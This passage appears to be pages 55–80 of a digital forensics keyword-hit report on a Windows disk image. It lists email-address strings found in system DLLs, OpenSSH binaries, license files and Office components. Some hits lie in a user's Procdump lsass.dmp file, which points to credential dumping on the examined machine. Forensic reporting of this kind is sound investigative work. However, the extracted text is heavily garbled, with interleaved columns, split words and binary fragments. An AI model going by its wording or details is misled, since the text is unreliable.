[email protected]« onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7
md5sha1 sha256 sha3 e35c/ssh-keyscan.exe
~/.ssh/known_hosts2 «chacha20- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-

[email protected]«,aes12 components-
8-ctr,aes192-c onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7
e35c/ssh.exe
Page 55/145
T
a
Preview Source File
g
s
«chacha20- common-components-
[email protected]« failed onecore_31bf3856ad364e35_10.0.17763.1_none_ad6c66b207e8
to retrieve c478/ssh-add.exe
[email protected]« onecore_31bf3856ad364e35_10.0.17763.1_none_ad6c66b207e8
md5sha1 sha256 sha3 c478/ssh-agent.exe
[email protected]« failed onecore_31bf3856ad364e35_10.0.17763.1_none_ad6c66b207e8
to retrieve c478/ssh-keygen.exe
[email protected]
T
a
Preview Source File
g
s
hambersignroot.crl0 /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows
«chambersignroot@chambersign. Defender/Scans/mpcache-
org«0* chambersignroot@c 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin.5B
hambersignroot.crl0 /
«chambersignroot@chambersign. img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dm
org«0* chambersignroot@c p
hambersignroot.crl0 /
«chambersignroot@chambersign. img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/l
org«0* chambersignroot@c sass.dmp
hambersignroot.crl0 /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll
«chambersignroot@chambersign.
org«0* chambersignroot@c
Page 56/145
T
a
Preview Source File
g
s
hambersignroot.crl0 /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll
«chambersignroot@chambersign.
org«0* chambersignroot@c
hambersignroot.crl0 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-
«chambersignroot@chambersign. windows-crypt32-
org«0* chambersignroot@c dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/
crypt32.dll
hambersignroot.crl0 /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-
«chambersignroot@chambersign. windows-crypt32-
org«0* chambersignroot@c dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/
crypt32.dll
[email protected]
T
a
Preview Source File
g
s
g/chambersroot.crl0 /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows
«[email protected] Defender/Scans/mpcache-
«0' chambersroot@cham 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin.5B
g/chambersroot.crl0 /
«[email protected] img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp
«0' chambersroot@cham
g/chambersroot.crl0 /
«[email protected] img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/l
«0' chambersroot@cham sass.dmp
g/chambersroot.crl0 /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll
«[email protected]
Page 57/145
T
a
Preview Source File
g
s
g/chambersroot.crl0 /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll
«[email protected]
g/chambersroot.crl0 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-
«[email protected] windows-crypt32-
«0' chambersroot@cham dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/
crypt32.dll
g/chambersroot.crl0 /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-
«0' chambersroot@cham dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/
crypt32.dll
[email protected]
Ta
Preview Source File
gs
christian giuffre /img_disk.raw/vol_vol7/Windows/Temp/script-5d269e0c-

<«[email protected]«>. # # 241c-b64c-96b7-4b2fb1b3dc05.ps1
permission is
[email protected]
T
a
Preview Source File
g
s
stinatarii din list /

01.01.2000"" 0-9 8 nms002.inf_amd64_6d7ddeebcacd2a6d/Amd64/FXSRES.DLL

01.01.2000"" 0-9 8 DLL

01.01.2000"" 0-9 8 bf3856ad364e35_10.0.17763.1_none_de4a75df21a850fc/Amd64/FXSR
Page 58/145
T
a
Preview Source File
g
s
ES.DLL
[email protected]
T
a
Preview Source File
g
s
mea de email este: /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

„nu s-a putu
mea de email este: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]« t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb
„nu s-a putu 1e7da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
scrie-mi pe /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

sau [email protected]
scrie-mi pe /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
sau [email protected] e7da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
actat și la adresa: /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

salvează li
Page 59/145
T
a
Preview Source File
g
s
actat și la adresa: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

salvează li e7da144/Alphabet.xml
[email protected]
Ta
Preview Source File
gs
\wbem\net cim.dll /
x)«[email protected]« or,str ator ) img_disk.raw/vol_vol7/Windows/WinSxS/ManifestCache/4
*pdf v 20eca21891c0180_blobs.bin
[email protected]
T
a
Preview Source File
g
s
gin:vcard9 f:@b: /img_disk.raw/vol_vol7/Program Files (x86)/Common

m:@«[email protected] Files/system/wab32.dll
m« @msn.com software\m
egin:vcard f:@b: /img_disk.raw/vol_vol7/Program Files/Common

m:@«[email protected] Files/system/wab32.dll
m« @msn.com software\m
egin:vcard f:@b: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-

m:@«[email protected] windows-wab-
m« @msn.com software\m core_31bf3856ad364e35_10.0.17763.1_none_45e9575aa1f28fec/
wab32.dll
gin:vcard9 f:@b: /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-

m:@«[email protected] windows-wab-
m« @msn.com software\m core_31bf3856ad364e35_10.0.17763.1_none_503e01acd65351e
7/wab32.dll
Page 60/145
[email protected]
Ta
Preview Source File
gs
2001 stephan kulow /img_disk.raw/vol_vol7/Program Files/VMware/VMware

(«[email protected]«) this file is free Tools/open_source_licenses.txt
[email protected]
Ta
Preview Source File
gs
nod , loca /
xmodif ]«[email protected]« img_disk.raw/vol_vol7/Windows/WinSxS/ManifestCache/4
vemovel(' ngd!'~, d 20eca21891c0180_blobs.bin
[email protected]
T
a
Preview Source File
g
s
gn.com by e-mail at «cps- /img_disk.raw/vol_vol7/Windows/SysWOW64/cryptdlg.dll

[email protected]«; or
by mail at veri
gn.com by e-mail at «cps- /img_disk.raw/vol_vol7/Windows/System32/cryptdlg.dll

[email protected]«; or
by mail at veri
gn.com by e-mail at «cps- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-

[email protected]«; or windows-cryptdlg-
by mail at veri dll_31bf3856ad364e35_10.0.17763.1_none_134e4707703f7b96/cry
ptdlg.dll
gn.com by e-mail at «cps- /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-

[email protected]«; or windows-cryptdlg-
by mail at veri dll_31bf3856ad364e35_10.0.17763.1_none_1da2f159a4a03d91/cry
ptdlg.dll
Page 61/145
[email protected]
T
a
Preview Source File
g
s
ocs or by e-mail at /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows

«[email protected]«.0 Defender/Scans/mpcache-
19k&ks n79u u>g| 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin.5B
ocs or by e-mail at /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp

«[email protected]«.0
19k&ks n79u u>g|
ocs or by e-mail at /
«[email protected]«.0 img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsass.d
19k&ks n79u u>g| mp
ocs or by e-mail at /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll

19k&ks n79u u>g|
ocs or by e-mail at /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll

19k&ks n79u u>g|
ocs or by e-mail at /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]«.0 crypt32-
19k&ks n79u u>g| dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/crypt3
2.dll
ocs or by e-mail at /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-

«[email protected]«.0 crypt32-
19k&ks n79u u>g| dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/crypt3
2.dll
Page 62/145
[email protected]
T
a
Preview Source File
g
s
t naar mijn e-mail: /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

ze is qua u
t naar mijn e-mail: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

ze is qua u e7da144/Alphabet.xml
[email protected]
Ta
Preview Source File
gs
10 francisco jerez /img_disk.raw/vol_vol7/pagefile.sys

<«[email protected]«>
permission is
10 francisco jerez /
<«[email protected]«> img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/One
permission is Drive/18.143.0717.0002/ThirdPartyNotices.txt
10 francisco jerez /
<«[email protected]«> img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/One
permission is Drive/18.143.0717.0002_1/ThirdPartyNotices.txt
[email protected]
T
a
Preview Source File
g
s
1 curve25519-sha256 /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-keyscan.exe

«curve25519-
[email protected]«
sntrup4591761x25519
1 curve25519- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh.exe

sha256,«curve25519-
[email protected]«,ecdh-sha2-
Page 63/145
T
a
Preview Source File
g
s
nistp256,
al kex proposal: %s /img_disk.raw/vol_vol7/Program Files/OpenSSH/sshd.exe

«curve25519-
[email protected]« diffie-
hellman-grou
1 curve25519-sha256 /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh-
«curve25519- keyscan.exe
[email protected]« %s: %s
first_kex_fo
1 curve25519- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe
sha256,«curve25519-
[email protected]«,ecdh-sha2-
nistp256,
1 curve25519-sha256 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-
«curve25519- components-
[email protected]« %s: %s onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e
first_kex_fo 35c/ssh-keyscan.exe
1 curve25519- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-
sha256,«curve25519- components-
[email protected]«,ecdh-sha2- onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e
nistp256, 35c/ssh.exe
[email protected]
T
a
Preview Source File
g
s
following address: /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp

«[email protected]
om«.0 {0y0= 1http://cer
Page 64/145
T
a
Preview Source File
g
s
following address: /
«[email protected] img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsa
om«.0 {0y0= 1http://cer ss.dmp
following address: /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll

«[email protected]
following address: /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll

«[email protected]
following address: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-

om«.0 {0y0= 1http://cer dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/cr
ypt32.dll
following address: /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-

om«.0 {0y0= 1http://cer dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/cr
ypt32.dll
[email protected]
Ta
Preview Source File
gs
thor: carl d. worth /img_disk.raw/vol_vol7/Program Files/VMware/VMware

«[email protected]« > bsd-3 cairo- Tools/open_source_licenses.txt
1.1
Page 65/145
[email protected]
T
a
Preview Source File
g
s
esse électronique : /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

ma société
esse électronique : /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

ma société e7da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
:@7^;@jo,8#z8 ckzaj /img_disk.raw/vol_vol7/Windows/Speech/Engines/SR/en-US/l1033.ngr

«[email protected]«9 9t}@d$}
/ah:z 1aet
:@7^;@jo,8#z8 ckzaj /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]«9 9t}@d$} speechrecognizer-en-
/ah:z 1aet us_31bf3856ad364e35_10.0.17763.1_none_a7d4b3ba449618b9/l1033.n
gr
[email protected]
Ta
Preview Source File
gs
7 daniel elstner /img_disk.raw/vol_vol7/Program Files/VMware/VMware

<«[email protected]«> this file is Tools/open_source_licenses.txt
part
Page 66/145
[email protected]
T
a
Preview Source File
g
s
7, daniel stenberg, /img_disk.raw/vol_vol7/Windows/Help/en-US/credits.rtf

«[email protected]«, and
many contribut
7 daniel stenberg, /img_disk.raw/vol_vol7/Windows/SysWOW64/curl.exe

<«[email protected]«>.
license https://c
7 daniel stenberg, /img_disk.raw/vol_vol7/Windows/System32/curl.exe

<«[email protected]«>.
license https://c
7 daniel stenberg, /
<«[email protected]«>. img_disk.raw/vol_vol7/Windows/WinSxS/amd64_curl_31bf3856ad364e35
license https://c _10.0.17763.1_none_6f3199f47554443b/curl.exe
7, daniel stenberg, /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]«, and help-credits.resources_31bf3856ad364e35_10.0.17763.1_en-
many contribut us_9f32aadd3c4c1e93/credits.rtf
7 daniel stenberg, /
<«[email protected]«>. img_disk.raw/vol_vol7/Windows/WinSxS/wow64_curl_31bf3856ad364e3
license https://c 5_10.0.17763.1_none_79864446a9b50636/curl.exe
[email protected]
T
a
Preview Source File
g
s
ose. contact /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

« with any questions.
Page 67/145
T
a
Preview Source File
g
s
ose. contact /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

« with any questions. 1e7da144/Alphabet.xml
designbindingpickernodeproject@designbindingpickernodeinstancesrdesignbin
dingpickertreeviewaccessiblename.desi
T
a
Preview Source File
g
s
dingpickernodeother<«designbindingpickernodeproj /
ect@designbindingpickernodeinstancesrdesignbindi img_disk.raw/vol_vol7/Windows/Microsoft.NET/
ngpickertreeviewaccessiblename.desi«gnerbatchcre Framework/v4.0.30319/System.Design.dll
atetool,
ngpickertreeviewaccessiblename.desi«gnerbatchcre Framework64/v4.0.30319/System.Design.dll
atetool,
ngpickertreeviewaccessiblename.desi«gnerbatchcre assembly/GAC_MSIL/System.Design/v4.0_4.0.
atetool, 0.0__b03f5f7f11d50a3a/System.Design.dll
ect@designbindingpickernodeinstancesrdesignbindi img_disk.raw/vol_vol7/Windows/WinSxS/amd64
ngpickertreeviewaccessiblename.desi«gnerbatchcre _netfx4-
atetool, system.design_b03f5f7f11d50a3a_4.0.15713.0
_none_9127809ba0035806/System.Design.dll
ect@designbindingpickernodeinstancesrdesignbindi img_disk.raw/vol_vol7/Windows/WinSxS/msil_s
ngpickertreeviewaccessiblename.desi«gnerbatchcre ystem.design_b03f5f7f11d50a3a_4.0.15713.0_
atetool, none_56142d2005a0523b/System.Design.dll
Page 68/145
[email protected]
Ta
Preview Source File
gs
uthor: ryan lortie /img_disk.raw/vol_vol7/Program Files/VMware/VMware

<«[email protected]«> additional lice Tools/open_source_licenses.txt
[email protected]
Ta
Preview Source File
gs
10 diego gutierrez /img_disk.raw/vol_vol7/Program Files/VMware/VMware

2011
[email protected]
T
a
Preview Source File
g
s
%dport_open_helper «direct- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh.exe

[email protected]«
connection to port
%dport_open_helper «direct- /img_disk.raw/vol_vol7/Program Files/OpenSSH/sshd.exe

[email protected]«
forwarded-streamloc
%dport_open_helper «direct- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe

[email protected]«
connection to port
%dport_open_helper «direct- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-

[email protected]« components-
connection to port onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e
35c/ssh.exe
Page 69/145
[email protected]
Ta
Preview Source File
gs
rmance data, etc to /img_disk.raw/vol_vol7/Program Files/VMware/VMware

«[email protected]« version 2.8.3 thu Tools/open_source_licenses.txt
[email protected]
T
a
Preview Source File
g
s
2015 desmond brand /img_disk.raw/vol_vol7/Program

(«[email protected]«)\ Files/WindowsApps/Microsoft.SkypeApp_14.26.95.0_x64__kzf8q
n\npermission is h xf38zg5c/ReactAssets/index.windows.bundle
[email protected]
T
a
Preview Source File
g
s
leave coauthor one /img_disk.raw/vol_vol7/Program

«docstest1@docse3testtenant. Files/WindowsApps/Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x
onmicrosoft.com« coauthor two 64__8wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
docste Shared/OFFICE16/MSO.DLL
[email protected]
T
a
Preview Source File
g
s
ft.com coauthor two /img_disk.raw/vol_vol7/Program

«docstest2@docse3testtenant. Files/WindowsApps/Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x
onmicrosoft.com« coauthor 64__8wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
three docs Shared/OFFICE16/MSO.DLL
Page 70/145
[email protected]
T
a
Preview Source File
g
s
.com coauthor three /img_disk.raw/vol_vol7/Program

«docstest3@docse3testtenant. Files/WindowsApps/Microsoft.MicrosoftOfficeHub_17.8918.5926.0_
onmicrosoft.com« mock reply x64__8wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
message. Shared/OFFICE16/MSO.DLL
[email protected]
T
a
Preview Source File
g
s
9601} coauthor four /img_disk.raw/vol_vol7/Program

«docstest4@docse3testtenant. Files/WindowsApps/Microsoft.MicrosoftOfficeHub_17.8918.5926.0_
onmicrosoft.com« {37cead57- x64__8wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
78e0-4c17 Shared/OFFICE16/MSO.DLL
[email protected]
T
a
Preview Source File
g
s
efortestingpurposes /img_disk.raw/vol_vol7/Program
«[email protected] Files/WindowsApps/Microsoft.MicrosoftOfficeHub_17.8918.5926.0_
nmicrosoft.com« {37cead57- x64__8wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
[email protected]
T
a
Preview Source File
g
s
99603} coauthor six /img_disk.raw/vol_vol7/Program

«[email protected] Files/WindowsApps/Microsoft.MicrosoftOfficeHub_17.8918.5926.0_
nmicrosoft.com« {37cead57- x64__8wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
Page 71/145
[email protected]
T
a
Preview Source File
g
s
oftware inc. don ho /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]«! a..ence-mitigations-
computer business s c1_31bf3856ad364e35_10.0.17763.1_none_fce8220f4a75d7c9/AcRes.dll
xe notepad++ don ho /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]« a..ence-mitigations-
notes.exe guitare m c1_31bf3856ad364e35_10.0.17763.1_none_fce8220f4a75d7c9/sysmain.s
db
oftware inc. don ho /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]«! a..necoreuap.resources_31bf3856ad364e35_10.0.17763.1_en-
computer business s us_21f9973424a340b3/AcRes.dll.mui
oftware inc. don ho /img_disk.raw/vol_vol7/Windows/apppatch/AcRes.dll

«[email protected]«!
computer business s
xe notepad++ don ho /img_disk.raw/vol_vol7/Windows/apppatch/sysmain.sdb

notes.exe guitare m
oftware inc. don ho /img_disk.raw/vol_vol7/Windows/apppatch/en-US/AcRes.dll.mui

«[email protected]«!
computer business s
[email protected]
T
a
Preview Source File
g
s
. dirección: /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

m« la producció
. dirección: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
Page 72/145
T
a
Preview Source File
g
s
m« la producció 7da144/Alphabet.xml
[email protected]
Ta
Preview Source File
gs
nc. ulrich drepper /img_disk.raw/vol_vol7/Program Files/VMware/VMware

<«[email protected]«>, 1995. this Tools/open_source_licenses.txt
progr
[email protected]
Ta
Preview Source File
gs
2000-2006 dug song /img_disk.raw/vol_vol7/Program Files/VMware/VMware

<«[email protected]«> all rights Tools/open_source_licenses.txt
reser
[email protected]
Ta
Preview Source File
gs
r(s): daniel witte /img_disk.raw/vol_vol7/Program Files/VMware/VMware

<«[email protected]«> alternatively, Tools/open_source_licenses.txt
th
[email protected]
T
a
Preview Source File
g
s
í: fundada em 1969 /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

(«[email protected]«). à shared/ink/Alphabet.xml
noite, g
Page 73/145
T
a
Preview Source File
g
s
í: fundada em 1969 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

(«[email protected]«). à t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1e
noite, g 7da144/Alphabet.xml
[email protected]
Ta
Preview Source File
gs
5c b0p86f-0 e00b6:f «[email protected]« /

xerp csbrok2e music img_disk.raw/vol_vol7/Windows/WinSxS/ManifestCache/42
[email protected]
T
a
Preview Source File
g
s
95-1998 eric young /img_disk.raw/vol_vol7/pagefile.sys

(«[email protected]«)
all rights res
tten by eric young /img_disk.raw/vol_vol7/Program Files/VMware/VMware

(«[email protected]«). Tools/open_source_licenses.txt
this product inc
by eric young * /img_disk.raw/vol_vol7/Program

(«[email protected]«). Files/WindowsApps/Microsoft.Office.OneNote_16001.10228.20003.0_x64
this product inc __8wekyb3d8bbwe/resources.pri
by eric young * /img_disk.raw/vol_vol7/Program

(«[email protected]«). Files/WindowsApps/microsoft.windowscommunicationsapps_17.9330.213
this product inc 65.0_x64__8wekyb3d8bbwe/resources.pri
95-1998 eric young /

(«[email protected]«) img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDrive/18.
all rights res 143.0717.0002/ThirdPartyNotices.txt
Page 74/145
T
a
Preview Source File
g
s
95-1998 eric young /

(«[email protected]«) img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDrive/18.
all rights res 143.0717.0002_1/ThirdPartyNotices.txt
n by eric young * /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_hyperv-

(«[email protected]«). vmchipset_31bf3856ad364e35_10.0.17763.1_none_c603bc16e4d1c5e1/
this product inc VmChipset Third-Party Notices.txt
n by eric young * /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_hyperv-

(«[email protected]«). vmchipset_31bf3856ad364e35_10.0.17763.529_none_4a2003e0123e6ce
this product inc 0/VmChipset Third-Party Notices.txt
[email protected]
T
a
Preview Source File
g
s
acc0 clfd ]bpy ubp /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows

x0v0t 0e0, https: 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin.5B
acc0 clfd ]bpy ubp /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp

x0v0t 0e0, https:
acc0 clfd ]bpy ubp /

«[email protected]«0 img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsass.d
x0v0t 0e0, https: mp
acc0 clfd ]bpy ubp /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll

x0v0t 0e0, https:
acc0 clfd ]bpy ubp /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll

x0v0t 0e0, https:
Page 75/145
T
a
Preview Source File
g
s
acc0 clfd ]bpy ubp /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

x0v0t 0e0, https: dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/crypt3
2.dll
acc0 clfd ]bpy ubp /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-

x0v0t 0e0, https: dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/crypt3
2.dll
[email protected]
T
a
Preview Source File
g
s
penssh.com dsa-cert «ecdsa-sha2- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-add.exe

[email protected]«
ecdsa-cert ecdsa-sh
penssh.com dsa-cert «ecdsa-sha2- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-agent.exe

[email protected]«
ecdsa-cert ecdsa-sh
penssh.com dsa-cert «ecdsa-sha2- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-keygen.exe

[email protected]«
ecdsa-cert ecdsa-sh
penssh.com dsa-cert «ecdsa-sha2- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-

[email protected]« keyscan.exe
ecdsa-cert ecdsa-sh
%s: protocol error «ecdsa-sha2- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh.exe

nistp256-cert-
[email protected]«,ecdsa-sha2-
nistp384
Page 76/145
T
a
Preview Source File
g
s
penssh.com dsa-cert «ecdsa-sha2- /img_disk.raw/vol_vol7/Program Files/OpenSSH/sshd.exe

[email protected]«
ecdsa-cert ecdsa-sh
penssh.com dsa-cert «ecdsa-sha2- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh-

[email protected]« add.exe
ecdsa-cert ecdsa-sh

[email protected]« agent.exe
ecdsa-cert ecdsa-sh

[email protected]« keygen.exe
ecdsa-cert ecdsa-sh

ecdsa-cert ecdsa-sh
x->nnew (%zu / %zu) «ecdsa- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe

sha2-nistp256-cert-
nistp384
penssh.com dsa-cert «ecdsa-sha2- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-

[email protected]« client-components-
ecdsa-cert ecdsa-sh onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c
7e35c/ssh-keyscan.exe
x->nnew (%zu / %zu) «ecdsa- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-

sha2-nistp256-cert- client-components-
[email protected]«,ecdsa-sha2- onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c
nistp384 7e35c/ssh.exe

[email protected]« common-components-
ecdsa-cert ecdsa-sh onecore_31bf3856ad364e35_10.0.17763.1_none_ad6c66b207e
Page 77/145
T
a
Preview Source File
g
s
8c478/ssh-add.exe

8c478/ssh-agent.exe

8c478/ssh-keygen.exe
[email protected]
T
a
Preview Source File
g
s
nssh.com ecdsa-cert «ecdsa-sha2- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-add.exe

[email protected]«
ecdsa-sha2-nistp521
nssh.com ecdsa-cert «ecdsa-sha2- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-agent.exe

[email protected]«
ecdsa-sha2-nistp521
nssh.com ecdsa-cert «ecdsa-sha2- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-

ecdsa-sha2-nistp521
nssh.com ecdsa-cert «ecdsa-sha2- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-

ecdsa-sha2-nistp521
[email protected],«ecdsa- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh.exe

sha2-nistp384-cert-
Page 78/145
T
a
Preview Source File
g
s
nistp521
nssh.com ecdsa-cert «ecdsa-sha2- /img_disk.raw/vol_vol7/Program Files/OpenSSH/sshd.exe

[email protected]«
ecdsa-sha2-nistp521
nssh.com ecdsa-cert «ecdsa-sha2- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh-

[email protected]« add.exe
ecdsa-sha2-nistp521

[email protected]« agent.exe
ecdsa-sha2-nistp521

ecdsa-sha2-nistp521

ecdsa-sha2-nistp521
[email protected],«ecdsa- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe
sha2-nistp384-cert-
nistp521
nssh.com ecdsa-cert «ecdsa-sha2- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-

ecdsa-sha2-nistp521 onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c
[email protected],«ecdsa- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-
[email protected]«,ecdsa-sha2- onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c
nistp521 7e35c/ssh.exe
Page 79/145
T
a
Preview Source File
g
s

ecdsa-sha2-nistp521 onecore_31bf3856ad364e35_10.0.17763.1_none_ad6c66b207e
8c478/ssh-add.exe

8c478/ssh-agent.exe

8c478/ssh-keygen.exe
[email protected]
T
a
Preview Source File
g
s
[email protected] «ecdsa- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-add.exe

sha2-nistp521-cert-
[email protected]« unknownssh-
unknown,
[email protected] «ecdsa- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-agent.exe

sha2-nistp521-cert-
[email protected]« ssh-unknown
nistp25
[email protected] «ecdsa- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-

sha2-nistp521-cert- keygen.exe
unknown
[email protected] «ecdsa- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-

sha2-nistp521-cert- keyscan.exe
Page 80/145
T
a
Preview Source File
g
s
nistp25
[email protected],«ecdsa- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh.exe

sha2-nistp521-cert-
[email protected]«,ssh-ed25519-
cert-v0
[email protected] «ecdsa- /img_disk.raw/vol_vol7/Program Files/OpenSSH/sshd.exe

sha2-nistp521-cert-
unknown,
[email protected] «ecdsa- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh-

sha2-nistp521-cert- add.exe
unknown,

